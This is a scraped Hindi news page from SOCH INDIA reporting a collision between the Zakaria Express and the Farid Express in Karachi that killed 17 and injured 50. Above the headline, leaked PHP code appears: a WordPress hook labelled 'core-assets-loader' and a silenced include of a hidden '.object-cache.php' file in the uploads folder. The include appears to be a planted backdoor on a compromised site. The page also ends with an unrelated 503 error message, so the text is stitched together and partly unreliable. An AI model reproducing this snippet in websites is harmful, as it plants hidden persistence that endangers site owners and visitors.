add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कराची में दो ट्रेनों की टक्कर में 17 की मौत, 50 घायल – SOCH INDIA
Menu

दुनिया
कराची में दो ट्रेनों की टक्कर में 17 की मौत, 50 घायल

nobanner

पाकिस्तान के शहर कराची में एक पैसेंजर ट्रेन के एक खड़ी हुई ट्रेन से टकरा जाने पर कम से कम 17 लोगों की मौत हो गई और 50 अन्य घायल हो गए. गुरुवार सुबह लांढी क्षेत्र के गद्दाफी शहर में 7 बजकर 18 मिनट पर हुई इस दुर्घटना में जकारिया एक्सप्रेस जुमा गोठ ट्रेन स्टेशन पर खड़ी फरीद एक्सप्रेस से टकरा गई. इस टक्कर के कारण फरीद एक्सप्रेस की दो और जकारिया एक्सप्रेस की एक बोगी पूरी तरह क्षतिग्रस्त हो गईं.

ट्रेन के ड्राइवर ने सिग्नल को किया नजरअंदाज!
ट्रेनों के डिब्बे आपस में भिड़े हुए और पलटे हुए दिखाई दे रहे हैं और स्थानीय मीडिया की खबर के अनुसार, बचावकर्मी मलबे में फंसे लोगों को निकालने के लिए काम कर रहे हैं. फरीद एक्सप्रेस लाहौर से कराची आ रही थी जबकि जकारिया एक्सप्रेस मुल्तान से चली थी. जियो न्यूज के अनुसार, शुरुआती जांच में पता चला है कि जकारिया एक्सप्रेस के चालक ने सिग्नल को नजरअंदाज कर दिया था.

17 शव जिन्ना अस्पताल लाए गए
जिन्ना अस्पताल में आपातकालीन विभाग की प्रमुख डॉ सीमी जमाली ने कहा कि 17 शव और 50 घायलों को जिन्ना अस्पताल में लाया गया है. उन्होंने कहा, ‘घायलों में से कई लोगों को सिर में चोटें आई हैं और कुछ की हालत नाजुक है.’इस दुर्घटना के कारण यातायात बाधित हो गया और घायलों को ला रही एंबुलेंसें सड़कों पर फंसी रहीं.

शरीफ ने जताया अफसोस, दिए जांच के आदेश
कराची से चलने वाली सभी ट्रेनें बचाव कार्य के पूरे होने तक निलंबित कर दी गई हैं. राष्ट्रपति ममनून हुसैन और प्रधानमंत्री नवाज शरीफ ने इस दुर्घटना में हुई मौतों पर दुख जाहिर किया है. शरीफ ने दुर्घटना की तत्काल जांच के आदेश दिए और घायलों को चिकित्सीय सुविधाएं उपलब्ध कराने के लिए अधिकारियों को आदेश जारी किए.

मृतकों को 10 और घायलों को 5 लाख मुआवजा
रेल मंत्री ख्वाजा साद रफीक ने मृतकों के लिए 10 लाख रुपए और घायलों को पांच लाख रुपए का मुआवजा देने की घोषणा की है. सितंबर में, कराची जा रही एक पैसेंजर ट्रेन के पंजाब प्रांत के मुल्तान के पास खड़ी एक मालगाड़ी से टकरा जाने पर छह लोग मारे गए थे और 150 से ज्यादा अन्य घायल हो गए थे. यह दुर्घटना तड़के हुई थी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.